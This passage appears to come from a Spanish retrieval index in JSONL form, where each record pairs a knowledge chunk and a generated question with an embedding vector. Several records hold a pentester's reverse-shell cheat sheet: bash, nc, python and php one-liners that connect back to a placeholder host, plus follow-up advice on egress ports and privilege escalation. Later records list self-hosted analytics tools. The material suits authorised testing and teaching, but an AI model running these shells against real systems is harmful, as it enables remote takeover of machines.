0.04046, -0.03259, -0.02153, -0.01936, -0.01426, 0.03371, -0.03923, -0.09088, -0.0073, 0.00797, 0.02267, -0.03543, -0.071, 0.07894, -0.05701, -0.06691, -0.04542, -0.0251, -0.05712, 0.02079, -0.06595, -0.05656, -0.09121, 0.00973, -0.02736, -0.01062, -0.02167, 0.00929]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> MΓ‘s payloads (war/aspx/jsp, x64, encoders) β†’ genera con msfvenom. Referencia viva: revshells.com.", "indexar": "con que puedo crear una conexiΓ³n inversa segura si solo tengo instalado python?", "v": [0.03961, 0.10449, -0.30065, -0.06519, 0.05913, -0.13234, -0.11723, -0.08099, -0.13549, -0.14404, -0.0364, 0.0229, 0.06977, -0.00748, -0.02951, 0.00186, -0.03158, -0.05656, 0.13431, -0.06956, -0.05846, -0.02662, -0.09027, -0.14374, 0.07811, 0.07953, -0.01539, 0.02731, -0.05826, -0.08534, 0.04138, 0.04949, 0.11002, 0.1319, -0.15318, -0.05085, 0.01522, 0.07222, 0.07597, 0.08466, -0.04086, -0.00725, 0.02039, 0.1434, -0.02638, 0.02038, 0.12268, -0.06032, 0.02752, -0.00907, -0.13371, -0.0655, -0.1245, -0.20271, -0.0062, -0.13234, 0.15699, -0.07773, 0.11953, 0.01118, -0.10757, -0.0028, -0.00716, 0.10231, 0.09719, -0.01526, 0.02773, -0.06856, -0.09088, 0.04301, -0.06485, -0.0145, -0.06004, 0.04309, 0.09721, 0.01862, -0.00321, -0.05267, 0.02544, 0.10364, -0.09959, -0.03551, -0.00814, -0.05104, -0.05713, -0.10933, -0.02061, -0.01007, 0.09361, -0.07632, 0.0237, 0.01215, 0.00447, -0.02015, -0.03729, 0.00062, 0.02715, -0.05782, -0.06872, 0.01869, -0.02415, 0.00379, 0.08189, 0.13329, -0.03115, -0.04229, 0.03335, 0.0116, 0.02539, -0.04084, 0.04817, 0.04714, 0.00824, -0.0753, -0.01899, -0.05537, -0.04597, 0.05752, -0.02732, 0.04375, -0.0256, -0.00726, -0.03483, 0.05404, 0.03577, -0.01638, 0.02079, 0.13457, -0.05579, 0.06453, -0.04961, -0.02582, 0.01897, -0.10751, -0.03884, 0.09883, 0.01647, -0.04882, 0.00707, -0.00457, -0.01002, 0.08576, 0.00287, -0.04398, 0.02273, 0.03655, -0.0259, -0.05298, -0.06217, 0.00826, -0.00419, 0.06521, -0.01247, 0.05085, -0.09192, 0.09223, -0.01649, -0.02696, 0.05064, 0.04401, 0.05086, 0.0625, 0.0162, -0.02667, -0.00231, -0.01018, -0.1003, -0.06098, 0.10691, 0.02213, -0.07441, 0.04567, 0.02952, -0.05574, 0.02307, -0.06386, -0.01808, -0.01208, -0.04614, -0.02748, -0.02297, -0.02561, -0.01577, -0.08921, -0.00846, -0.00244, 0.02697, 0.04524, 0.01966, 0.01228, 0.00532, 0.01382, -0.04548, 0.05427, -0.00553, -0.04999, 0.01707, -0.02709, 0.02723, 0.01573, 0.02897, -0.02392, -0.01092, -0.03872, 0.02595, 0.0593, -0.07561, 0.0914, -0.00899, 0.01076, 0.08676, -0.02627, 0.07016, 0.03756, -0.004, -0.03544, 0.03029, 0.03846, -0.00531, 0.00417, -0.02561, -0.00404, -0.00591, 0.00479, 0.0158, -0.05886, -0.03635, -0.00172, 0.01605, 0.03592, -0.00837, 0.01048, -0.02147, -0.02924, 0.04416, 0.01428, 0.00311, -0.04396, -0.01889, 0.01696, 0.00507, 0.05992, -0.00929, -0.08205, -0.02054, -0.02012, -0.06135, 0.01707, -0.06972, -0.06527, -0.01912, 0.03498, 0.05077, -0.02682, -0.01306, -0.00654]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> MΓ‘s payloads (war/aspx/jsp, x64, encoders) β†’ genera con msfvenom. Referencia viva: revshells.com.", "indexar": "cual es la sintaxis correcta en php para ejecutar un shell interactivo a travΓ©s de una socket?", "v": [0.09778, -0.01004, -0.19115, 0.11055, 0.16281, -0.26692, -0.0972, -0.13778, 0.03276, 0.04043, -0.11841, 0.023, -0.02415, -0.07922, 0.05912, 0.01908, 0.02428, -0.08258, -0.05238, -0.09482, -0.0517, -0.09591, -0.06898, -0.12777, -0.08224, 0.06816, -0.01243, 0.12523, -0.05778, -0.01485, -0.07063, -0.08461, 0.12177, 0.00412, -0.03186, -0.02453, -0.10736, -0.0049, 0.06943, 0.11169, -0.10534, 0.13308, -0.14899, 0.01236, 0.02763, 0.03657, 0.07105, -0.10608, 0.03455, -0.05283, -0.04798, 0.01519, -0.17708, 0.01315, -0.00602, -0.06636, 0.12242, -0.26519, 0.04198, -0.04518, -0.00162, 0.01285, -0.01293, 0.00782, 0.02453, -0.01154, -0.03912, -0.09109, 0.00177, 0.02982, -0.01514, 0.08282, -0.05093, 0.09302, 0.04259, -0.00303, 0.0219, -0.02911, 0.05155, 0.05135, 0.01581, -0.04483, -0.07022, -0.00346, -0.11192, -0.0522, -0.02054, -0.10039, -0.02032, 0.02351, 0.06052, 0.04316, -0.0158, -0.00836, -0.00336, -0.10937, -0.01702, -0.03422, -0.08063, -0.00322, 0.13649, 0.0136, -0.0849, 0.04482, 0.05776, -0.02214, -0.04162, 0.07273, 0.03546, -0.01651, 0.03916, -0.03114, -0.03647, -0.05542, -0.01897, -0.04985, -0.00969, -0.03716, 0.02513, -0.07381, -0.04502, 0.02144, -0.04688, 0.00866, -0.00506, 0.05728, 0.01799, 0.09118, 0.00486, 0.04727, 0.00438, -0.05812, 0.00707, -0.04571, -0.07721, 0.11236, 0.10511, 0.03749, -0.00024, -0.10729, 0.03115, 0.01765, -0.01677, 0.02986, 0.02317, 0.06126, -0.01811, 0.0258, -0.06604, 0.00566, -0.03808, 0.01162, 0.01039, 0.0145, -0.0379, -0.04621, 0.01758, 0.02188, -0.01301, -0.00884, 0.01146, -0.00504, 0.01298, -0.03292, 0.01468, -0.09858, -0.0886, 0.01471, 0.02859, 0.00201, -0.00857, 0.02949, 0.02955, -0.00321, 0.01491, -0.05157, -0.10115, -0.0845, 0.07401, -0.00714, 0.01559, -0.06778, -0.0179, -0.03043, -0.04511, -0.03059, 0.02784, -0.00385, -0.05526, 0.08805, 0.02985, -0.01582, -0.04687, 0.00078, 0.07094, -0.04201, 0.02881, -0.07242, -0.0092, -0.03194, -0.00953, 0.01218, 0.03608, -0.06063, 0.05477, 0.02371, -0.04971, -0.00555, -0.03117, 0.01452, 0.04455, 0.01866, 0.06793, -0.00081, -0.01805, -0.04053, 0.04846, -0.00598, 0.01269, 0.11115, -0.03539, -0.02348, 0.07865, -0.04932, -0.03893, 0.013, 0.02423, -0.00462, -0.0551, -0.04975, -0.08661, 0.00818, 0.00681, -0.00224, 0.02945, 0.05555, 0.02501, -0.03818, -0.01988, -0.06095, 0.04911, 0.09027, -0.06805, -0.10454, 0.01994, 0.00891, -0.07265, -0.00133, 0.00088, -0.05674, -0.03038, 0.04288, 0.01707, -0.01259, 0.07459, -0.0469]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- **Estabiliza** la shell β†’ Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng β†’ Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering Β· msfvenom Β· Metasploit Β· OSCP MOC", "indexar": "quΓ© herramienta puedo usar para probar permisos de elevaciΓ³n en Linux y Windows?", "v": [0.03278, 0.09364, -0.16923, -0.18358, 0.0367, -0.08394, -0.15129, -0.0405, -0.09733, -0.14326, -0.05798, -0.06768, 0.04219, -0.04827, -0.04601, -0.06497, 0.00971, -0.12432, -0.0874, -0.0284, -0.03485, 0.01378, -0.22134, -0.01501, -0.0084, 0.03026, 0.0913, -0.09676, -0.09431, 0.02692, -0.08725, 0.09578, 0.02304, 0.00995, -0.05334, 0.03085, -0.02775, 0.0368, 0.11688, 0.03348, 0.07342, 0.04617, -0.03278, 0.05456, -0.04876, -0.10464, 0.00679, -0.05799, -0.02499, -0.06033, 0.01192, -0.09329, -0.06402, -0.08923, 0.05269, -0.05868, 0.23204, -0.11843, 0.04563, -0.00344, -0.10179, 0.02464, -0.05198, 0.02639, -0.00142, -0.01904, -0.0121, -0.04395, -0.09833, 0.11805, -0.05035, 0.09574, 0.04683, 0.01348, 0.07159, 0.05148, -0.1242, -0.02242, 0.09331, -0.05477, 0.05061, 0.07334, -0.07531, -0.0532, -0.11616, -0.25395, 0.01902, -0.01962, 0.03635, -0.01599, 0.0747, 0.02535, -0.02054, 0.027, 0.1036, -0.06008, 0.06075, 0.03637, -0.01771, 0.00763, 0.05583, -0.03665, -0.03567, 0.12942, -0.04814, 0.0216, 0.02414, -0.11652, -0.08118, -0.02903, 0.06396, 0.00754, -0.0418, 0.00609, -0.09467, -0.00305, -0.05037, -0.09652, -0.07375, -0.02432, 0.03567, 0.0051, -0.04669, -0.00255, 0.00685, -0.05666, -0.06126, 0.18716, -0.07962, -0.08432, 0.04225, -0.06194, -0.01202, 0.00988, -0.0417, 0.04502, 0.0246, -0.0927, -0.0223, -0.04674, 0.04183, 0.06637, 0.01514, -0.05559, 0.0588, 0.04246, -0.01679, 0.01244, -0.03867, -0.0623, 0.03254, -0.03652, -0.00768, 0.05902, -0.08171, -0.00669, 0.00121, 0.01856, -0.05983, 0.02991, -0.04862, -0.00683, 0.01783, 0.06324, 0.03004, -0.00205, 0.00028, 0.00251, 0.02682, 0.01662, 0.0239, 0.06816, 0.00334, -0.05667, 0.07119, -0.08513, -0.01124, -0.0279, -0.05899, -0.02386, -0.04454, 0.04424, -0.00791, -0.06886, 0.03413, 0.0126, -0.01674, 0.01642, 0.01588, 0.0571, -0.03595, 0.063, 0.04115, -0.06511, -0.00705, 0.0158, -0.01144, -0.05337, 0.02318, 0.00656, -0.05827, -0.01457, -0.042, -0.08318, 0.07944, -0.0179, -0.04947, 0.03993, 0.02951, 0.02149, 0.01788, -0.00519, 0.05871, -0.04731, -0.00729, -0.01759, 0.01591, 0.03345, -0.01206, -0.05397, 0.03915, 0.01826, 0.08437, 0.01517, 0.00165, -0.0282, -0.00058, 0.00467, 0.00239, 0.02319, 0.04536, 0.02084, -0.02143, 0.00841, 0.01736, -0.02134, 0.06265, 0.00427, -0.04942, -0.0306, -0.06184, 0.09668, 0.004, -0.07093, -0.07868, -0.05196, -0.01381, -0.01326, -0.05652, -0.08913, -0.0099, 0.02299, 0.04118, -0.03658, -0.02191, 0.02848]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- **Estabiliza** la shell β†’ Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng β†’ Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering Β· msfvenom Β· Metasploit Β· OSCP MOC", "indexar": "cΓ³mo consigo estabilizar una conexiΓ³n TTY si hay filtrado de salida (egress filtering)?", "v": [-0.0741, 0.00682, -0.21239, -0.15687, 0.13881, -0.08256, -0.15572, 0.02639, 0.0911, 0.13321, -0.13613, 0.05195, 0.0108, 0.15412, 0.06807, -0.01198, 0.03896, -0.02015, -0.03104, -0.03083, -0.07137, 0.00499, -0.03388, -0.21479, 0.09982, 0.03753, -0.00454, -0.03661, -0.17512, -0.11206, 0.07687, -0.01565, 0.12372, -0.00885, -0.05424, -0.02152, -0.06517, 0.13457, -0.04248, 0.03921, -0.04568, -0.01829, 0.08361, 0.00261, 0.05399, -0.08209, -0.03963, -0.05835, 0.12673, 0.08312, -0.10688, 0.03937, -0.11882, 0.01804, -0.09598, -0.04905, 0.00315, -0.04192, 0.07334, -0.04201, -0.1035, -0.02256, 0.07162, 0.08255, 0.00289, -0.05035, 0.01886, 0.03826, -0.01199, 0.13619, 0.00753, -0.03617, -0.03064, -0.01618, 0.06549, 0.05446, 0.09226, 0.02069, 0.04685, 0.09332, -0.03826, -0.02847, -0.01958, -0.06105, -0.09254, -0.05273, -0.0346, -0.07853, -0.0998, -0.04406, 0.02182, -0.04501, -0.06333, -0.06443, -0.07359, -0.06849, -0.06582, -0.07223, -0.04293, 0.02985, 0.03187, -0.0044, 0.00025, 0.12987, -0.0181, -0.04946, 0.0791, 0.02467, -0.10881, 0.06013, -0.06699, 0.08835, 0.06616, -0.09341, 0.00312, 0.07923, 0.03428, -0.04242, 0.01097, -0.0202, -0.05699, -0.08498, -0.07269, -0.12876, 0.03295, 0.05883, 0.07141, 0.01147, -0.07675, -0.0204, -0.04906, 0.13336, -0.0826, -0.00704, -0.03297, -0.03343, 0.02175, -0.07784, -0.01193, -0.14412, -0.07615, 0.00957, -0.03353, 0.07961, 0.07882, 0.06653, 0.06053, -0.03223, -0.08872, 0.04194, 0.01565, 0.00221, -0.02867, -0.03588, 0.02132, 0.01809, -0.02437, -0.03829, -0.03055, -0.02245, 0.06963, 0.04922, -0.00836, 0.02508, 0.03329, 0.02711, -0.03785, -0.02336, -0.01511, -0.11546, 0.01213, 0.01868, -0.04671, -0.00621, -0.02363, -0.05698, -0.03081, 0.00144, -0.0244, 0.02598, 0.07408, 0.00386, -0.0193, -0.05799, 0.01506, 0.01881, -0.04653, -0.06057, 0.00946, 0.00829, -0.01063, 0.01882, -0.05869, -0.03301, 0.09346, -0.10003, 0.00936, -0.08019, 0.02557, -0.00805, -0.02088, -0.02406, 0.05823, -0.0267, -0.01993, -0.00435, 0.01072, -0.03043, 0.0726, -0.02407, -0.00764, 0.09818, -0.00086, -0.0364, -0.04824, 0.05256, 0.00019, -0.0293, 0.04568, 0.04828, -0.01645, 0.02158, 0.07343, 0.07121, 0.00191, 0.03422, -0.00999, -0.0492, -0.01681, 0.01073, 0.0224, -0.04182, -0.02994, -0.0712, -0.03157, 0.03036, -0.05261, -0.02559, -0.03904, -0.04058, 0.03958, -0.05049, 0.02464, -0.00469, -0.01146, -0.03038, -0.0456, 0.03564, 0.0536, 0.00598, -0.03223, -0.0217, 0.04924, -0.01476, 0.04655, 0.02656]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- **Estabiliza** la shell β†’ Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng β†’ Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering Β· msfvenom Β· Metasploit Β· OSCP MOC", "indexar": "cuΓ‘les son los programas recomendados para realizar pruebas de obtenciΓ³n de privilegios?", "v": [0.34435, 0.1684, -0.02483, -0.04751, 0.20637, -0.09556, 0.14736, -0.1062, -0.12707, -0.08456, -0.03402, 0.05364, 0.0372, -0.0944, 0.03174, 0.04379, 0.09616, -0.03614, -0.01306, 0.09891, -0.00667, -0.079, -0.14149, -0.03782, -0.1077, 0.03699, 0.05122, 0.00868, -0.00922, 0.03254, 0.03802, 0.01879, -0.0168, -0.09247, -0.02033, 0.06049, 0.03004, 0.10714, -0.03446, 0.02438, -0.01376, -0.05763, -0.05197, -0.03013, 0.05151, -0.09596, -0.0313, 0.11659, -0.08201, -0.17628, 0.06839, 0.05559, 0.04843, -0.09923, 0.01805, -0.14297, -0.08698, -0.00839, 0.02411, 0.04189, -0.00808, -0.06586, 0.00463, -0.00746, 0.09773, -0.02627, 0.01253, 0.03255, -0.0671, 0.03232, -0.02288, -0.02217, 0.05159, 0.02304, -0.06119, 0.03764, -0.0084, -0.0192, 0.03944, -0.0794, 0.0654, -0.0117, -0.00806, -0.01542, -0.09611, -0.06123, 0.04346, -0.04127, -0.00596, -0.06385, 0.06837, -0.00541, -0.00643, 0.07004, 0.03339, -0.03844, 0.04757, 0.09125, 0.05256, 0.00545, 0.05968, -0.0638, -0.04384, 0.13943, -0.08826, 0.03802, 0.01465, -0.06675, -0.08595, -0.02631, -0.05725, 0.00118, -0.03776, 0.04955, -0.13155, 0.03648, -0.04607, -0.08402, -0.04095, -0.07009, -0.10551, -0.02358, -0.1221, -0.04894, 0.00157, 0.00675, 0.07491, 0.0464, 0.01351, 0.11698, 0.03944, 0.02413, -0.02753, -0.02129, -0.06289, -0.00872, 0.02142, -0.03658, -0.0522, -0.09868, 0.08531, -0.05619, 0.01785, 0.00985, 0.05198, 0.04556, -0.02932, 0.02023, -0.02702, -0.03822, -0.05886, -0.01117, 0.00054, 0.01289, -0.09009, -0.01936, -0.01722, -0.03575, 0.024, 0.05079, -0.01204, 0.00226, -0.10381, -0.01194, 0.11419, 0.06752, 0.0178, -0.01967, 0.04006, 0.02758, 0.00564, 0.07574, -0.06008, -0.10173, 0.02181, 0.03133, 0.02669, -0.02173, 0.01087, -0.01268, -0.11527, 0.09581, -0.00574, 0.03218, 0.01453, -0.06121, -0.01246, -0.02198, 0.07072, 0.0714, 0.01837, 0.02117, 0.00669, -0.00572, 0.03443, 0.02011, -0.01349, 0.04948, -0.04078, -0.05184, -0.09527, -0.10769, -0.05544, -0.03996, 0.04379, 0.03467, -0.00693, -0.0246, -0.00232, 0.0651, 0.03372, -0.01529, 0.05022, -0.0473, -0.05167, -0.01663, -0.01737, -0.05807, -0.03522, 0.02825, -0.05903, -0.01786, 0.05583, 0.0409, -0.00424, -0.03165, 0.02538, 0.04432, 0.07405, 0.02891, 0.04572, -0.01899, 0.00671, -0.01647, 0.03029, 0.06404, 0.01669, -0.04358, 0.01938, -0.1049, 0.04123, 0.09837, 0.03813, -0.05953, 0.0136, -0.00826, -0.04536, 0.02368, 0.00272, -0.04744, 0.00935, 0.01256, 0.06505, -0.00946, 0.03082, -0.02722]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: ANALOG β€” A minimal analytics tool. Tracks events in a span of 10-30 days [MIT, Nodejs/Docker]. Aptabase β€” Privacy first and simple analytics for mobile and desktop apps [AGPL-3.0, Docker]. AWStats β€” Generate statistics from web, streaming, ftp or mail server logfiles [GPL-3.0, Perl]. Countly Community Edition β€” Real time mobile and web analytics, crash reporting and push notifications platform [AGPL-3.0, Nodejs/Docker]. d8a.tech β€” A data collection service that works with your existing Google Analytics setup to capture user activity and send it straight to your own private database [MIT, Go/Docker]. Daily Stars Explorer β€” Track GitHub repo trends with daily star insights to see growth and community interest over time [⚠, MIT, Go/Nodejs/Docker]. Druid β€” Distributed, column-oriented, real-time analytics data store [Apache-2.0, Java/Docker]. EDA β€” Web application for data analysis and visualization [AGPL-3.0, Nodejs/Docker]. GoAccess β€” Real-time web log analyzer and interactive viewer that runs in a terminal [GPL-2.0, C].", "indexar": "quΓ© herramienta sirve para analizar logs de servidor en tiempo real sin instalar nada?", "v": [-0.02156, 0.13885, -0.20428, -0.15481, 0.0141, -0.18246, -0.06358, -0.11256, -0.03092, 0.01546, -0.10295, -0.11431, 0.01955, -0.09097, 0.14963, 0.0491, 0.1002, -0.18947, 0.03905, 0.04204, -0.0282, -0.01622, -0.0634, -0.02279, -0.05483, 0.01398, 0.08686, -0.076, -0.16065, -0.03757, -0.06651, 0.01232, 0.0469, -0.06018, -0.07354, -0.02905, 0.01267, 0.05194, -0.0644, 0.08701, 0.07284, 0.04044, -0.02344, 0.05142, 0.03689, -0.05317, 0.00631, -0.06324, 0.03996, -0.00147, -0.05184, -0.08302, -0.05303, -0.01329, -0.02304, -0.1241, 0.13694, -0.1666, 0.14171, -0.08821, -0.20909, 0.07971, -0.07813, -0.01749, 0.11068, 0.02041, 0.03261, -0.04746, -0.03886, -0.03869, -0.13419, 0.01574, -0.00416, -0.06208, 0.04435, 0.022, 0.02824, 0.03697, 0.05507, 0.01396, 0.12079, -0.04217, -0.04639, 0.09485, -0.08935, -0.06452, 0.03068, -0.03559, 0.03852, -0.02739, -0.01728, 0.12225, -0.00168, 0.04762, 0.08081, -0.04635, 0.16632, -0.07882, 0.04822, -0.00075, 0.09713, -0.02967, -0.03169, 0.07537, 0.01078, 0.06955, 0.02695, -0.0858, 0.00023, -0.04559, 0.04563, 0.00753, -0.04925, -0.00254, 0.01158, -0.01389, 0.02739, -0.07196, -0.08081, 0.01855, -0.02042, 0.0055, -0.04632, 0.0086, -0.03589, -0.07014, 0.03254, -0.02448, 0.03978, 0.00147, -0.02498, -0.06302, -0.10798, 0.00823, -0.07137, -0.0441, 0.01544, -0.05937, -0.08284, -0.06846, 0.02982, 0.09011, -0.09375, -0.06927, 0.07294, 0.04126, 0.00471, -0.01862, -0.06999, -0.01722, 0.09879, -0.03793, -0.01952, 0.04531, -0.07907, -0.05963, 0.00468, -0.04037, -0.10047, 0.01657, 0.03982, 0.00233, 0.02998, 0.00014, 0.03021, -0.08954, 0.02369, 0.03022, 0.14373, 0.07036, 0.01564, 0.03956, 0.02304, -0.07502, 0.01455, -0.05255, -0.04228, -0.04484, 0.01092, -0.04571, -0.03542, 0.00199, 0.01507, -0.00466, -0.03372, -0.02747, -0.03556, 0.01095, -0.01092, 0.02365, 0.0672, -0.00955, -0.00904, 0.02871, 0.0636, -0.00871, -0.00118, -0.07801, 1e-05, -0.03557, -0.05487, -0.00668, -0.0172, -0.01945, 0.0478, 0.08098, -0.0417, 0.04084, -0.00354, 0.04528, 0.02419, 0.00879, 0.02184, -0.05036, -0.01744, -0.03195, 0.04269, -0.00681, -0.01599, -0.00953, 0.00752, 0.00374, 0.02176, -0.02937, -0.04655, 0.02143, 0.02171, 0.03307, 0.04063, 0.00672, -0.0488, 0.0133, -0.03733, -0.00214, 0.01082, -0.06049, 0.04968, -0.02891, -0.03984, -0.08126, 0.01913, 0.08862, 0.00119, -0.04155, -0.0616, -0.06796, -0.01919, -0.01636, -0.02793, -0.09436, -0.03704, -0.0035, 0.07546, -0.03302, 0.05634, -0.02276]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: ANALOG β€” A minimal analytics tool. Tracks events in a span of 10-30 days [MIT, Nodejs/Docker]. Aptabase β€” Privacy first and simple analytics for mobile and desktop apps [AGPL-3.0, Docker]. AWStats β€” Generate statistics from web, streaming, ftp or mail server logfiles [GPL-3.0, Perl]. Countly Community Edition β€” Real time mobile and web analytics, crash reporting and push notifications platform [AGPL-3.0, Nodejs/Docker]. d8a.tech β€” A data collection service that works with your existing Google Analytics setup to capture user activity and send it straight to your own private database [MIT, Go/Docker]. Daily Stars Explorer β€” Track GitHub repo trends with daily star insights to see growth and community interest over time [⚠, MIT, Go/Nodejs/Docker]. Druid β€” Distributed, column-oriented, real-time analytics data store [Apache-2.0, Java/Docker]. EDA β€” Web application for data analysis and visualization [AGPL-3.0, Nodejs/Docker]. GoAccess β€” Real-time web log analyzer and interactive viewer that runs in a terminal [GPL-2.0, C].", "indexar": "cuΓ‘l es una alternativa libre y minimalista al Google Analytics para seguimiento de eventos?", "v": [0.08361, 0.10791, -0.03543, -0.12518, -0.08095, -0.08245, -0.0823, -0.05535, -0.13501, 0.0179, -0.08898, -0.15749, -0.03729, 0.11241, 0.12987, -0.02523, 0.05243, -0.10791, 0.08174, 0.01308, -0.1608, -0.01963, -0.13003, -0.13451, 0.00792, -0.11418, 0.0494, 0.01448, -0.04092, 0.00862, -0.0767, -0.03202, -0.11079, -0.05839, -0.10284, -0.01707, 0.10654, 0.05149, -0.02281, -0.15083, -0.04421, -0.11869, 0.00535, 0.02768, -0.06436, -0.11322, -0.05083, 0.12736, -0.05538, -0.0353, -0.04248, 0.09407, -0.14498, 0.06906, 0.05604, 0.02094, 0.01425, -0.20396, 0.0171, -0.08636, -0.03453, 0.06276, -0.0214, 0.09589, 0.07261, 0.03148, 0.06553, 0.03509, -0.0194, 0.05488, 0.03512, -0.06025, -0.07998, 0.00254, 0.09753, 0.086, 0.01588, 0.04751, -0.11338, 0.05963, 0.05636, -0.09821, -0.03789, 0.07697, -0.03381, 0.02115, 0.0269, -0.17494, 0.00391, -0.00183, 0.02414, 0.09783, -0.02552, 0.01206, -0.08323, 0.00724, 0.11364, -0.11461, -0.03984, 0.03558, 0.10754, -0.01277, -0.0569, -0.04912, 0.06106, -0.03144, -0.04521, 0.04181, -0.07445, 0.02301, -0.04003, -0.00135, -0.08579, -0.00859, 0.06561, 0.01997, -0.01521, 0.02405, -0.01405, -0.00322, -0.02206, 0.00306, -0.14762, -0.06449, -0.08512, 0.06395, -0.01871, 0.05046, 0.04114, -0.01215, 0.09237, -0.02688, -0.08309, 0.05418, -0.03969, 0.13246, 0.01047, -0.02343, 0.02994, 0.05738, -0.02509, -0.02974, 0.06886, -0.03909, 0.14405, -0.08991, 0.01626, -0.00684, -0.04797, 0.0216, -0.05482, 0.02483, -0.04015, 0.04436, -0.03582, -0.05034, -0.12706, -0.02306, -0.00261, -0.02607, -0.01937, -0.02627, 0.02664, 0.02781, 0.05022, -0.05605, 0.11955, -0.03003, -0.01596, 0.05362, -0.01149, 0.05694, 0.00121, -0.12674, 0.04348, -0.02591, -0.01275, -0.09878, 0.06036, -0.0379, -0.03186, 0.01335, -0.02119, 0.01946, 0.03454, -0.06986, 0.00696, -0.00789, 0.06085, 0.10128, -0.03029, 0.02473, 0.01843, -0.07294, 0.04088, 0.0098, 0.0306, -0.08076, -0.00221, 0.02992, -0.07441, -0.01077, 0.02704, 0.01251, -0.02075, 0.03519, 0.00661, 0.07149, 0.02849, 0.0025, -0.02407, -0.02004, 0.01002, -0.04749, -0.0442, 0.02441, 0.03083, 0.00481, 0.07651, -0.0016, 0.04806, -0.01106, -0.01406, -0.00733, -0.02535, 0.01744, 0.02118, -0.01, -0.07403, -0.01802, 0.02396, -0.00022, -0.00436, 0.0558, 0.01473, -0.03782, -0.01151, 0.00787, 0.0321, -0.01976, 0.04124, 0.01094, -0.01429, 0.05037, -0.01165, -0.00201, -0.05175, 0.02759, -0.03226, -0.05822, -0.00583, 0.03212, 0.04082, -0.02037, 0.01182, 0.03369]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: ANALOG β€” A minimal analytics tool. Tracks events in a span of 10-30 days [MIT, Nodejs/Docker]. Aptabase β€” Privacy first and simple analytics for mobile and desktop apps [AGPL-3.0, Docker]. AWStats β€” Generate statistics from web, streaming, ftp or mail server logfiles [GPL-3.0, Perl]. Countly Community Edition β€” Real time mobile and web analytics, crash reporting and push notifications platform [AGPL-3.0, Nodejs/Docker]. d8a.tech β€” A data collection service that works with your existing Google Analytics setup to capture user activity and send it straight to your own private database [MIT, Go/Docker]. Daily Stars Explorer β€” Track GitHub repo trends with daily star insights to see growth and community interest over time [⚠, MIT, Go/Nodejs/Docker]. Druid β€” Distributed, column-oriented, real-time analytics data store [Apache-2.0, Java/Docker]. EDA β€” Web application for data analysis and visualization [AGPL-3.0, Nodejs/Docker]. GoAccess β€” Real-time web log analyzer and interactive viewer that runs in a terminal [GPL-2.0, C].", "indexar": "con quΓ© puedo construir un panel de anΓ‘lisis de datos distribuido que funcione con Docker?", "v": [-0.01702, 0.11116, -0.15635, -0.09517, 0.03237, -0.08757, 0.08877, 0.00647, -0.20115, -0.08799, -0.03732, -0.17225, -0.10107, -0.16647, 0.00734, -0.10583, 0.05477, -0.12398, -0.01213, -0.07286, -0.04481, -0.10106, -0.03801, -0.09229, 0.01434, -0.04, -0.01604, -0.02907, -0.16097, 0.10334, 0.09329, -0.01709, 0.03543, -0.07981, 0.02358, -0.02907, -0.04021, 0.17829, 0.084, -0.02787, -0.018, 0.02307, -0.12158, 0.01418, -0.0304, 0.02716, -0.09754, -0.1317, 0.03153, -0.02634, -0.07803, 0.02812, -0.06492, 0.02146, -0.04882, 